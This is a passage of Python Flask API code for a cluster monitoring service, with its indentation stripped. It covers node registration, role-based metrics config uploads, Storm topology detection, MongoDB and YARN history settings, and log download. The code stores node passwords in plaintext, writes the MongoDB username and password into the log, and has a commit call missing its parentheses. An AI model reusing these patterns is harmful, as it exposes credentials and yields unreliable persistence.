response = jsonify({"Status": "No LS instances found!"})
response.status_code = 500
app.logger.warning('[%s] : [WARN] No LS Instance registered',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
qKBCore = dbKBCore.query.first()
if qKBCore is None:
response = jsonify({"Status": "No KB instances found!"})
response.status_code = 500
app.logger.warning('[%s] : [WARN] No KB Instance registered',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
rsp = r.json()
rspES = {'ElasticSearch': rsp}
LSVer = os.getenv('LS_VERSION', '2.2.0')
KBVer = os.getenv('KB_VERSION', '4.3.1')
rspLS = {'Logstash': {'Status': qLSCore.LSCoreStatus, 'Version': str(LSVer)}}
rspKB = {'Kibana': {'Status': qKBCore.KBCoreStatus, 'Version': str(KBVer)}}
rspD.update(rspES)
rspD.update(rspLS)
rspD.update(rspKB)
response = jsonify(rspD)
response.status_code = 200
return response
# @dmon.route('/v1/overlord/core/chef')
# class ChefClientStatus(Resource):
# def get(self):
# return "Monitoring Core Chef Client status"
#
#
# @dmon.route('/v1/overlord/nodes/chef')
# class ChefClientNodes(Resource):
# def get(self):
# return "Chef client status of monitored Nodes"
@dmon.route('/v1/overlord/nodes') # TODO -checkOS and -checkRoles
class MonitoredNodes(Resource):
def get(self):
nodeList = []
nodesAll = db.session.query(dbNodes.nodeFQDN, dbNodes.nodeIP).all()
if nodesAll is None:
response = jsonify({'Status': 'No monitored nodes found'})
response.status_code = 404
app.logger.warning('[%s] : [WARN] No registered nodes found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
for nl in nodesAll:
nodeDict = {}
# print >>sys.stderr, nl[0]
app.logger.info('[%s] : [INFO] Node %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), nl[0])
nodeDict.update({nl[0]: nl[1]})
nodeList.append(nodeDict)
response = jsonify({'Nodes': nodeList})
app.logger.info('[%s] : [INFO] Registered nodes %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(nodeList))
response.status_code = 200
return response
@api.expect(nodeSubmit)
def put(self):
if not request.json:
abort(400)
listN = []
if "Nodes" not in request.json:
response = jsonify({'Status': 'Malformed request',
'Message': 'JSON payload malformed'})
response.status_code = 400
app.logger.warning('[%s] : [WARN] Malformed json request',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
nLSI = ''
for nodes in request.json['Nodes']:
qNodes = dbNodes.query.filter_by(nodeFQDN=nodes['NodeName']).first()
qNodeLSinstance = dbSCore.query.first()
if qNodes is None:
if 'LogstashInstance' not in nodes:
if qNodeLSinstance is None:
nLSI = 'None'
app.logger.warning('[%s] : [WARN] No LS Instance registered',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
else:
nLSI = qNodeLSinstance.hostIP
app.logger.info('[%s] : [INFO] LS Instance %s assigned to %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'),
nodes['NodeName'], qNodeLSinstance.hostFQDN)
else:
nLSI = nodes['LogstashInstance']
app.logger.info('[%s] : [INFO] LS Instance at %s assigned to %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'),
nLSI, nodes['NodeName'])
if 'NodeOS' not in nodes:
nodeOS = 'unknown'
else:
nodeOS = nodes['NodeOS']
if 'key' not in nodes:
nodeKey = 'unknown'
else:
nodeKey = nodes['key']
e = dbNodes(nodeFQDN=nodes['NodeName'], nodeIP=nodes['NodeIP'], nodeOS=nodeOS,
nkey=nodeKey, nUser=nodes['username'], nPass=nodes['password'], nLogstashInstance=nLSI)
db.session.add(e)
else:
qNodes.nodeIP = nodes['NodeIP']
if 'NodeOS' in nodes:
qNodes.nodeOS = nodes['NodeOS']
if 'key' in nodes:
qNodes.nkey = nodes['key']
qNodes.nUser = nodes['username']
qNodes.nPass = nodes['password']
if 'LogstashInstance' not in nodes:
nLSI = qNodeLSinstance.hostIP
else:
nLSI = nodes['LogstashInstance']
app.logger.info('[%s] : [INFO] LS Instance changed for node %s from %s to %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'),
qNodes.nodeFQDN, qNodes.nLogstashInstance, nLSI)
qNodes.nLogstashInstance = nLSI
db.session.add(qNodes)
db.session.commit
response = jsonify({'Status': "Nodes list Updated!"})
response.status_code = 201
app.logger.info('[%s] : [INFO] Nodes updated',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
def post(self): #todo
return "Bootstrap monitoring"
@dmon.route('/v1/overlord/nodes/roles')
class ClusterRoles(Resource):
def get(self):
nodeList = []
nodesAll = db.session.query(dbNodes.nodeFQDN, dbNodes.nRoles).all()
if nodesAll is None:
response = jsonify({'Status': 'No monitored nodes found'})
response.status_code = 404
app.logger.warning('[%s] : [WARN] No registered nodes found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
for nl in nodesAll:
nodeDict = {}
app.logger.info('[%s] : [INFO] Node name -> %s ',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(nl[0]))
nodeDict.update({nl[0]: nl[1].split(', ')})
nodeList.append(nodeDict)
response = jsonify({'Nodes': nodeList})
app.logger.info('[%s] : [INFO] Nodes and their associted roles %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(nodeList))
response.status_code = 200
return response
@api.expect(listNodeRoles)
def put(self):
if not request.json:
response = jsonify({'Status': 'Malformed Request',
'Message': 'Only JSON requests are permitted'})
response.status_code = 400
app.logger.warning('[%s] : [WARN] Malformed request, not JSON',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
if "Nodes" not in request.json:
response = jsonify({'Status': 'Malformed Request',
'Message': 'Missing key(s)'})
response.status_code = 400
app.logger.warning('[%s] : [WARN] Malformed request, missing Node key',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
nrNodes = len(request.json['Nodes'])
for n in range(nrNodes):
if "NodeName" not in request.json['Nodes'][n]:
response = jsonify({'Status': 'Malformed Request',
'Message': 'Missing key(s)'})
response.status_code = 400
app.logger.warning('[%s] : [WARN] Malformed request, missing NodeName key',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
nList = request.json["Nodes"]
for n in nList:
# print n["NodeName"]
# print n["Roles"]
upRoles = dbNodes.query.filter_by(nodeFQDN=n["NodeName"]).first()
if upRoles is None:
response = jsonify({'Status': 'Node Name Error',
'Message': 'Node ' + str(n["NodeName"]) + ' not found!'})
response.status_code = 404
app.logger.warning('[%s] : [WARN] Node %s not found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'),
str(n["NodeName"]))
return response
for r in n["Roles"]:
if r not in lFrameworks:
response = jsonify({'Status': 'Error',
'Message': 'Unknown role in ' + str(r)})
response.status_code = 400
return response
upRoles.nRoles = ', '.join(map(str, n["Roles"]))
response = jsonify({'Status': 'Done',
'Message': 'All roles updated!'})
response.status_code = 201
app.logger.info('[%s] : [INFO] Node roles updated',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
def post(self):
nodes = db.session.query(dbNodes.nodeFQDN, dbNodes.nodeIP, dbNodes.nUser, dbNodes.nPass, dbNodes.nRoles).all()
if nodes is None:
response = jsonify({'Status': 'No monitored nodes found'})
response.status_code = 404
app.logger.warning('[%s] : [WARN] No registererd nodes found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
yarnList = []
sparkList = []
stormList = []
unknownList = []
templateLoader = jinja2.FileSystemLoader(searchpath="/")
templateEnv = jinja2.Environment(loader=templateLoader)
propYarnTmp = os.path.join(tmpDir, 'metrics/hadoop-metrics2.tmp')
propYarnFile = os.path.join(cfgDir, 'hadoop-metrics2.properties')
try:
template = templateEnv.get_template(propYarnTmp)
except:
response = jsonify({'Status': 'I/O Error', 'Message': 'Template file missing!'})
response.status_code = 500
app.logger.error('[%s] : [ERROR] YARN template file missing',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
qPeriod = dbMetPer.query.first()
if qPeriod is None:
period = '10'
else:
period = qPeriod.yarnMet
infoYarn = {'metrics2_period': period}
propSparkInfo = template.render(infoYarn)
propYarnConf = open(propYarnFile, "w+")
propYarnConf.write(propSparkInfo)
propYarnConf.close()
for node in nodes:
roleList = node[4].split(',')
if 'yarn' in roleList or 'hdfs' in roleList:
nl = []
nl.append(node[1])
uploadFile(nl, node[2], node[3], propYarnFile, 'hadoop-metrics2.tmp',
'/etc/hadoop/conf.cloudera.yarn/hadoop-metrics2.properties') # TODO better solution
uploadFile(nl, node[2], node[3], propYarnFile, 'hadoop-metrics2.tmp', #TODO instead of tmp add polling interval
'/etc/hadoop/conf.cloudera.hdfs/hadoop-metrics2.properties') # TODO better solution
uploadFile(nl, node[2], node[3], propYarnFile, 'hadoop-metrics2.tmp',
'/etc/hadoop/conf/hadoop-metrics2.properties') # TODO better solution
yarnList.append(node[0])
app.logger.info('[%s] : [INFO] HDFS/YARN conf upload to %s, %s, %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(nl),
str(node[2]), str(node[3]))
if 'spark' in roleList: # TODO Same as /v1/overlord/framework/<fwork>, needs unification
templateLoader = jinja2.FileSystemLoader(searchpath="/")
templateEnv = jinja2.Environment(loader=templateLoader)
propSparkTemp = os.path.join(tmpDir, 'metrics/spark-metrics.tmp')
propSparkFile = os.path.join(cfgDir, 'metrics.properties')
try:
template = templateEnv.get_template(propSparkTemp)
except:
response = jsonify({'Status': 'I/O Error', 'Message': 'Template file missing!'})
response.status_code = 500
app.logger.error('[%s] : [ERROR] Spark properties template missing',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
qLSCore = dbSCore.query.first() # TODO: Only works for single deployment
if qLSCore is None:
response = jsonify({'Status': 'Missing Instance', 'Message': 'No Logstash Instance Configured'})
response.status_code = 404
app.logger.warning('[%s] : [WARN] No LS instance registered')
return response
qPeriod = dbMetPer.query.first()
if qPeriod is None:
period = '10'
else:
period = qPeriod.sparkMet
infoSpark = {'logstashserverip': qLSCore.hostIP, 'logstashportgraphite': '5002', 'period': period}
app.logger.info(
'[%s] : [INFO] Spark Config used based on role def: LSServer -> %s, Graphite -> 5002, Period -> %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), qLSCore.hostIP, period)
propSparkInfo = template.render(infoSpark)
propSparkConf = open(propSparkFile, "w+")
propSparkConf.write(propSparkInfo)
propSparkConf.close()
nl = []
nl.append(node[1])
uploadFile(nl, node[2], node[3], propSparkFile, 'metrics.properties',
'/etc/spark/conf/metrics.properties') # TODO better solution
sparkList.append(node[0])
app.logger.info('[%s] : [INFO] Spark conf upload to %s, %s, %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(nl),
str(node[2]), str(node[3]))
if 'storm' in roleList:
stormList.append(node[0]) # TODO
if 'unknown' in roleList:
unknownList.append(node[0])
response = jsonify(
{'Status': {'yarn': yarnList, 'spark': sparkList, 'storm': stormList, 'unknown': unknownList}})
response.status_code = 200
app.logger.info('[%s] : [INFO] Status YARN List %s, SPARK List %s, STORM list %s, Unknown LIST %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(yarnList),
str(sparkList), str(stormList), str(unknownList))
return response
@dmon.route('/v1/overlord/detect/storm')
class DetectStormRA(Resource):
def get(self):
qSCore = dbSCore.query.first()
if qSCore is None:
response = jsonify({"Status": "No LS instances registered", "spouts": 0, "bolts": 0})
response.status_code = 500
app.logger.warning('[%s] : [WARN] No LS instance registred',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
if qSCore.LSCoreStormTopology == 'None':
response = jsonify({"Status": "No Storm topology registered"})
response.status_code = 404
app.logger.info('[%s] : [INFO] No Storm topology registered, cannot fetch number of spouts and bolts',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
else:
bolts, spouts = checkStormSpoutsBolts(qSCore.LSCoreStormEndpoint, qSCore.LSCoreStormPort, qSCore.LSCoreStormTopology)
response = jsonify({'Topology': qSCore.LSCoreStormTopology, "spouts": spouts, "bolts": bolts})
response.status_code = 200
app.logger.info('[%s] : [INFO] Storm topology %s with %s spounts and %s bolts found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'),
str(qSCore.LSCoreStormTopology), str(spouts), str(bolts))
return response
def post(self):
qNode = dbNodes.query.all()
if qNode is None:
response = jsonify({'Status': 'No registered nodes'})
response.status_code = 404
app.logger.warning('[%s] : [WARN] No nodes found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
qLSStorm = dbSCore.query.all()
if not qLSStorm:
response = jsonify({'Status': 'No registered logstash server'})
response.status_code = 404
app.logger.warning('[%s] : [WARN] No logstash instance found found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
regStorm = {}
for l in qLSStorm:
if l.LSCoreStormEndpoint != 'None':
app.logger.info('[%s] : [INFO] Found Storm Endpoint set to %s ',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), l.LSCoreStormEndpoint)
if validateIPv4(l.LSCoreStormEndpoint):
if l.LSCoreStormPort.isdigit():
regStorm[l.LSCoreStormEndpoint] = l.LSCoreStormPort
app.logger.info('[%s] : [INFO] Storm REST Port is %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), l.LSCoreStormPort)
else:
regStorm[l.LSCoreStormEndpoint] = '8080'
l.LSCoreStormPort = '8080'
app.logger.info('[%s] : [INFO] Storm REST Port set to default -> 8080',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
if l.LSCoreStormTopology != 'None':
try:
getTop = detectStormTopology(l.LSCoreStormEndpoint, l.LSCoreStormPort)
except Exception as inst:
app.logger.warning('[%s] : [WARNING] Error while trying enpoint -> %s port -> %s; with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), l.LSCoreStormEndpoint, l.LSCoreStormPort,
type(inst), inst.args)
getTop = 'None'
if l.LSCoreStormTopology == getTop:
response = jsonify({'Status': 'Topology Verified',
'Topology': getTop})
response.status_code = 200
app.logger.info('[%s] : [INFO] Topology %s verified',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), getTop)
return response
foundTopologies = set()
lsTopology = {}
if regStorm:
for k, v in regStorm.iteritems():
try:
topology = detectStormTopology(k, v)
except Exception as inst:
app.logger.warning('[%s] : [WARNING] Error while trying enpoint -> %s port -> %s; with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), k, v,
type(inst), inst.args)
break
foundTopologies.add(topology)
lsTopology[k] = topology
if len(foundTopologies) > 1:
setTopology = next(iter(foundTopologies))
for k, v in lsTopology.iteritems():
qLStorm = dbSCore.query.filter_by(LSCoreStormEndpoint=k).first()
if v == setTopology:
qLStorm.LSCoreStormTopology = setTopology
app.logger.info('[%s] : [INFO] Topology %s set at IP %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), setTopology, k)
break
response = jsonify({'Status': 'Topologies found ' + str(len(foundTopologies)),
'Topologies': list(foundTopologies),
'SetTopology': setTopology})
response.status_code = 201
return response
if lsTopology:
for k, v in lsTopology.iteritems():
qLStorm = dbSCore.query.filter_by(LSCoreStormEndpoint=k).all()
#TODO: adds Port and Storm Topology for all ls instances with the same set of registered Storm Endpoints, need to change in future versions
for e in qLStorm:
e.LSCoreStormTopology = v
app.logger.info('[%s] : [INFO] Topology %s set at IP %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), v, k)
response = jsonify({'Status': 'Topology found',
'Topology': list(foundTopologies)})
response.status_code = 201
return response
stormNodes = []
for n in qNode:
if "storm" in n.nRoles:
stormNodes.append(n.nodeIP)
if not stormNodes:
response = jsonify({'Status': 'Storm role not found'})
response.status_code = 404
app.logger.warning('[%s] : [WARNING] No nodes have storm role',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
resList = []
for n in stormNodes:
url = 'http://%s:%s/api/v1/topology/summary' %(n, '8080')
resList.append(url)
app.logger.info('[%s] : [INFO] Resource list for topoligy discovery -> %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), resList)
dmon = GreenletRequests(resList)
nodeRes = dmon.parallelGet()
topoIDs = {}
for i in nodeRes:
nodeIP = urlparse(i['Node'])
data = i['Data']
if data !='n/a':
try:
topoIDs[nodeIP.hostname] = data.get('topologies')[0]['id']
except Exception as inst:
app.logger.warning('[%s] : [WARN] No topology has been loaded, with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst), inst.args)
response = jsonify({'Status': 'No topology has been loaded'})
response.status_code = 404
return response
if not topoIDs:
response = jsonify({'Status': 'No Storm detected on registered nodes'})
response.status_code = 404
app.logger.info('[%s] : [INFO] No Storm detected on registered nodes',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
elif len(topoIDs) > 1:
response = jsonify({'Status': 'More than one Storm deployment detected',
'Message': 'Only one deployment per monitoring solution',
'Nodes': topoIDs})
response.status_code = 500
app.logger.info('[%s] : [INFO] More than one Storm detected: %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(topoIDs))
return response
for ls in qLSStorm:
for k, v in topoIDs.iteritems():
ls.LSCoreStormEndpoint = k
ls.LSCoreStormPort = '8080'
ls.LSCoreStormTopology = v
response = jsonify({'Status': 'Detected Storm deployment',
'StormEndpoint': topoIDs.keys()[0],
'StormTopology': topoIDs.get(topoIDs.keys()[0]),
'StormPort': '8080'
})
response.status_code = 201
dmon.reset()
return response
@dmon.route('/v1/overlord/mongo')
class MongoSettings(Resource):
def get(self):
qBDS = dbBDService.query.first()
if qBDS is None:
response = jsonify({'Status': 'No registered mongo settings'})
response.status_code = 404
app.logger.warning('[%s] : [WARN] No mongo settings found found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
if qBDS.mongoUser is None:
mUser = False
elif qBDS.mongoUser.strip():
mUser = True
else:
mUser = False
if qBDS.mongoPswd is None:
mPass = False
elif qBDS.mongoPswd.strip():
mPass = True
else:
mPass = False
response = jsonify({'MongoHost': qBDS.mongoHost, 'MongoPort': qBDS.mongoPort,
'User': mUser, 'Password': mPass, 'MongoDBs': qBDS.mongoDBs})
response.status_code = 200
return response
@api.expect(mongoDBConf)
def put(self):
if not request.json:
abort(400)
requiredKeys = ['MongoHost', 'MongoPort']
for key in requiredKeys:
if key not in request.json:
response = jsonify({'Error': 'malformed request, missing key(s)'})
response.status_code = 400
app.logger.warning('[%s] : [WARN] Malformed Request, missing key(s)',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
if 'MongoUser' not in request.json:
mUser = ''
else:
mUser = request.json['MongoUser']
if 'MongoPassword' not in request.json:
mPass = 'password'
else:
mPass = request.json['MongoPassword']
if 'MongoDBs' not in request.json:
dbs = 'admin'
else:
dbs = request.json['MongoDBs']
qBDS = dbBDService.query.first()
if qBDS is None:
# {'MongoHost': qBDS.mongoHost, 'MongoPort': qBDS.mongoPort,
# 'User': mUser, 'Password': mPass, 'MongoDBs': qBDS.mongoDBs})
e = dbBDService(mongoHost=request.json['MongoHost'], mongoPort=request.json['MongoPort'], mongoUser=mUser,
mongoPswd=mPass, mongoDBs=dbs)
db.session.add(e)
db.session.commit()
response = jsonify({'Status': 'Added MongoDB Settings'})
response.status_code = 201
app.logger.info('[%s] : [INFO] Added MongoDB settings: Host-> %s, Port ->%s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'),
str(request.json['MongoUser']), str(request.json['MongoPassword']))
return response
else:
qBDS.mongoHost = request.json['MongoHost']
qBDS.mongoPort = request.json['MongoPort']
qBDS.mongoUser = mUser
qBDS.mongoPswd = mPass
qBDS.mongoDBs = dbs
response = jsonify({'Status': 'Modified MongoDB Settings'})
response.status_code = 201
app.logger.info('[%s] : [INFO] Modified MongoDB settings: Host-> %s, Port ->%s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'),
str(request.json['MongoUser']), str(request.json['MongoPassword']))
return response
@dmon.route('/v1/overlord/storm/logs')
class StormLogs(Resource):
def get(self):
workerFile = 'workerlogs_*.tar'
lFile = []
for name in glob.glob(os.path.join(outDir, workerFile)):
path, filename = os.path.split(name)
lFile.append(filename)
response = jsonify({'StormLogs': lFile})
response.status_code = 200
app.logger.info('[%s] : [INFO] Available Storm logs %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(lFile))
return response
def post(self):
nodeList = []
nodesAll = db.session.query(dbNodes.nodeFQDN, dbNodes.nRoles, dbNodes.nodeIP).all()
try:
global backProc
# alive = backProc.is_alive()
alive = checkPID(int(open(os.path.join(tempDir, 'dsbp.pid')).read()))
if alive:
response = jsonify({'Status': 'Only one background process is permited', 'PID': str(backProc.pid),
'BProcess': 'Active'})
response.status_code = 409
return response
except Exception as inst:
app.logger.warning('[%s] : [WARN] First startup detected, skipping backgroundproces alive check',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
if nodesAll is None:
response = jsonify({'Status': 'No monitored nodes found'})
response.status_code = 404
app.logger.warning('[%s] : [WARN] No registered nodes found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
for nl in nodesAll:
app.logger.info('[%s] : [INFO] Node name -> %s ',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(nl[0]))
if 'storm' in nl[1].split(', '): #TODO modify to STORM
nodeList.append(nl[2])
if not nodeList:
response = jsonify({'Status': 'No nodes with role storm found'})
response.status_code = 404
return response
stormLogAgent = AgentResourceConstructor(nodeList, '5222')
resourceList = stormLogAgent.stormLogs()
backProc = multiprocessing.Process(target=getStormLogsGreen, args=(resourceList, ))
backProc.daemon = True
backProc.start()
pidFile = os.path.join(tempDir, 'dsbp.pid')
file(pidFile, 'w').write(str(backProc.pid))
response = jsonify({'Status': 'Started background process', 'PID': str(backProc.pid)})
response.status_code = 201
return response
@dmon.route('/v1/overlord/storm/logs/active')
class StormLogFetchActive(Resource):
def get(self):
try:
pid = int(open(os.path.join(tempDir, 'dsbp.pid')).read())
alive = checkPID(int(open(os.path.join(tempDir, 'dsbp.pid')).read()))
# pid = str(backProc.pid)
# alive = str(backProc.is_alive())
except Exception as inst:
app.logger.warning('[%s] : [WARN] No Background proc detected with %s and %s ',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst), inst.args)
response = jsonify({'Status': 'No background process detected'})
response.status_code = 404
return response
response = jsonify({'PID': pid,
'Alive': alive})
response.status_code = 200
return response
@dmon.route('/v1/overlord/storm/logs/<log>')
class StormLogsLog(Resource):
def get(self, log):
if not os.path.isfile(os.path.join(outDir, log)):
response = jsonify({'Status': 'Not found',
'StormLog': log})
response.status_code = 404
app.logger.warning('[%s] : [WARN] Strom log %s not found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), log)
return response
app.logger.info('[%s] : [INFO] Served Storm log %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), log)
return send_from_directory(outDir, log, as_attachment=True, mimetype='application/tar')
@dmon.route('/v1/overlord/detect/yarn')
class DetectYarnHS(Resource):
def get(self):
qDBS = dbBDService.query.first()
if qDBS is None:
response = jsonify({'Status': 'Not Found',
'Message': 'No Yarn history server instance found'})
response.status_code = 404
return response
response = jsonify({'NodePort': qDBS.yarnHPort,
'NodeIP': qDBS.yarnHEnd,
'Polling': qDBS.yarnHPoll})
response.status_code = 200
return response
@api.expect(yarnHistorySettings)
def put(self):
if not request.json:
abort(400)
qBDS = dbBDService.query.first()
if 'NodeIP' not in request.json:
nodeIP = 0
else:
nodeIP = request.json['NodeIP']
if 'NodePort' not in request.json:
nodePort = 0
else:
nodePort = request.json['NodePort']
if 'Polling' not in request.json:
poll = 0
else:
poll = request.json['Polling']
if qBDS is None:
if not nodeIP:
response = jsonify({'Status': 'Missing parameter',
'Message': 'Yarn History server IP must be defined at first submit'})
response.status_code = 406
return response
if not nodePort:
nodePort = 19888
if not poll:
poll = 30
upBDS = dbBDService(yarnHPort=nodePort, yarnHEnd=nodeIP, yarnHPoll=poll)
db.session.add(upBDS)
db.session.commit()
app.logger.info('[%s] : [INFO] Added Yarn History Server Node info',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
response = jsonify({'Status': 'Added Yarn History',
'Message': 'Added Yarn History server info'})
response.status_code = 200
return response
else:
if nodeIP:
qBDS.yarnHEnd = nodeIP
app.logger.info('[%s] : [INFO] Updated Yarn History Server Endpoint to %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), nodeIP)
if nodePort:
qBDS.yarnHPort = nodePort
app.logger.info('[%s] : [INFO] Updated Yarn History Server Port to %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(nodePort))
if poll:
qBDS.yarnHPoll = poll
app.logger.info('[%s] : [INFO] Updated Yarn History Server Polling period to %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(nodePort))
response = jsonify({'Status': 'Updated Yarn History',
'Message': 'Update Yarn History server info'})
response.status_code = 200
return response
def post(self):
#yarnDetect = DetectBDService()
response = servDet.detectYarnHS()
return response
@dmon.route('/v1/overlord/detect/spark')
class DetectSparkHS(Resource):
def get(self):
return 'Get spark history server settings'
def put(self):
return 'Define or modify spark history server endpoint'
def post(self):
return 'Define or modify spark history server endpoint'
@dmon.route('/v1/overlord/history/yarn')
class YarnHistoryServer(Resource):
def get(self):
qBDService = dbBDService.query.first()
if qBDService is None:
app.logger.warning('[%s] : [WARN] No entry for Yarn History server found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
response = jsonify({'Status': 'No Yarn History server entry found'})
response.status_code = 404
return response
elif qBDService.yarnHEnd == 'None':
app.logger.warning('[%s] : [WARN] Yarn History server not registered',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
response = jsonify({'Status': 'Yarn History server not registered'})
response.status_code = 404
return response
else:
try:
yarnJobsStatus, yarnJobs = getYarnJobs(qBDService.yarnHEnd, qBDService.yarnHPort)
except Exception as inst:
app.logger.warning('[%s] : [WARN] Yarn History server not responding at %s with port %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), qBDService.yarnHEnd, str(qBDService.yarnHPort))
response = jsonify({'Status': 'Yarn History server not responding'})
response.status_code = 408
return response
return yarnJobs
@dmon.route('/v1/overlord/history/yarn/jobs')
class YarnHistoryServerJobs(Resource):
def get(self):
qBDService = dbBDService.query.first()
if qBDService is None:
app.logger.warning('[%s] : [WARN] No entry for Yarn History server found',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
response = jsonify({'Status': 'No Yarn History server entry found'})
response.status_code = 404
return response
elif qBDService.yarnHEnd == 'None':
app.logger.warning('[%s] : [WARN] Yarn History server not registered',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
response = jsonify({'Status': 'Yarn History server not registered'})
response.status_code = 404
return response
else:
try:
yarnJobsStatus, yarnJobs = getYarnJobs(qBDService.yarnHEnd, qBDService.yarnHPort)
except Exception as inst:
app.logger.warning('[%s] : [WARN] Yarn History server not responding at %s with port %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), qBDService.yarnHEnd, str(qBDService.yarnHPort))
response = jsonify({'Status': 'Yarn History server not responding'})
response.status_code = 408
return response
try:
jStatJob = getYarnJobsStatistic(qBDService.yarnHEnd, qBDService.yarnHPort, yarnJobs)
except Exception as inst:
app.logger.warning('[%s] : [WARN] Yarn History server not responding at %s with port %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), qBDService.yarnHEnd, str(qBDService.yarnHPort))
response = jsonify({'Status': 'Yarn History server not responding'})
response.status_code = 408
return response
#TODO: Stronger sync index with logstash server needed
# dindex = 'logstash-%s' %datetime.now().strftime("%Y.%m.%d")
qES = dbESCore.query.filter_by(MasterNode=1).first()
if qES is None:
response = jsonify({'Status': 'ES not registered'})
response.status_code = 404
app.logger.error('[%s] : [ERROR] ES core not registered into dmon', datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'))
return response
try:
rIndex = dmonESIndexer(qES.hostIP, dmonindex='ystat', dmondoc_type='yarn_jobstat', docId='yarn-jobstat', body=jStatJob)
except Exception as inst:
app.logger.error('[%s] : [ERROR] Indexing failed with %s and %s',
datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), type(inst), inst.args)
response = jsonify({'Status': 'Error while indexing'})
response.status_code = 503
return response
app.logger.info('[%s] : [INFO] Jobs indexed %s', datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S'), str(rIndex))
# return rIndex
return jStatJob
